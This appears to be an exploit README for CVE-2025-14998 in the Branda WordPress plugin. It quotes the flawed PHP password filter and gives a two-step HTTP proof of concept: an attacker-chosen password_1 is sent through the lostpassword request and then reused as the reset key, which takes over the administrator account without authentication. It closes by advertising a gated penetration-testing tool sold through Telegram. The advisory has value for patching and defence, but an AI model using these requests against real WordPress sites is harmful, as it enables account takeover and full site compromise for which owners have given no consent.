KTN1990/CVE-2025-14998
CVE-2025-14998 Wordpress Plugin - Branda β White Label & Branding, Free Login Page Customizer <= 3.4.24 - Unauthenticated Privilege Escalation via Account Takeover
Wordpress Branda β White Label & Branding, Free Login Page Customizer <= 3.4.24 - Unauthenticated Privilege Escalation via Account Takeover
CVE-2025-14998 The Branda plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.4.24. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.
For more wordpress vulnerabilities and exclusive pentest tools contact me on telegram @KtN1990.
π Root Cause Analysis
The plugin overrides WordPressβs password generation logic by hooking into the
random_password filter. Instead of allowing WordPress to generate a secure
random password, the plugin replaces it with user-controlled input.
Vulnerable Code
public function password_random_password_filter( $password ) {
global $wpdb, $signup_password_use_encryption;
if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
$key = $_GET['key'];
} elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
$key = $_POST['key'];
}
if ( ! empty( $_POST['password_1'] ) ) {
$password = $_POST['password_1'];
} elseif ( ! empty( $key ) ) {
$signup = $wpdb->get_row(
$wpdb->prepare(
"SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
$key
)
);
if ( ! ( empty( $signup ) || $signup->active ) ) {
$meta = maybe_unserialize( $signup->meta );
if ( ! empty( $meta['password'] ) ) {
if ( 'yes' === $signup_password_use_encryption ) {
$password = $this->password_decrypt( $meta['password'] );
} else {
$password = $meta['password'];
}
}
}
}
return $password;
}π§ͺ Proof of Concept (Sanitized)
Step 1 β Trigger Password Reset with Arbitrary Password
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded
user_login=admin&
redirect_to=&
password_1=EfUSmvnTun5XbvE6RvIB&
wp-submit=Get+New+PasswordThe value of password_1 can be any attacker-controlled string.
Step 2 β Complete Reset Using the Same Value as the Reset Key
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.localβ Result
- WordPress accepts the attacker-controlled password
- The administrator password is changed
- The attacker can authenticate as the affected user
No email access or valid password reset token is required.
π₯ Impact
An unauthenticated attacker can:
- Reset passwords for any WordPress user
- Take over administrator accounts
- Gain full control of the WordPress installation
- Modify plugins, themes, or content
Contact
More vulnerabilities, Check Megatron!
- π£ What is Megatron? Megatron is an advanced penetration testing tool designed for serious testers and red teamers. Whether you're auditing, scanning, or testing infrastructures, Megatron gives you the power you need.
-π‘οΈ Ideal for:
β Security researchers
β Penetration testers
β Ethical hackers
-
π¦ aintained line with ~230 legacy research modules; recent scanner core improvements for stability and detection.
-
π― Purpose: Provided strictly for authorized security testing, education, defensive research, and red-team training. This release is not for unlawful use. Distribution is gated β access only after verification and a signed Responsible Use Agreement / NDA.
-π‘ Responsible access policy (summary):
- Access only to verified security professionals, corporate security teams, accredited labs, or training providers.
- You must provide org name, role, official email (corporate), and lawful purpose.
- Full download granted only after verification and signing our Responsible Use Agreement / NDA.
- Zero tolerance for misuse β evidence of malicious use results in revocation and reporting where required.
- π© Contact / Requests / Verification: @KTN1990 β include organization, role, and short reason for access. Telegram Channel
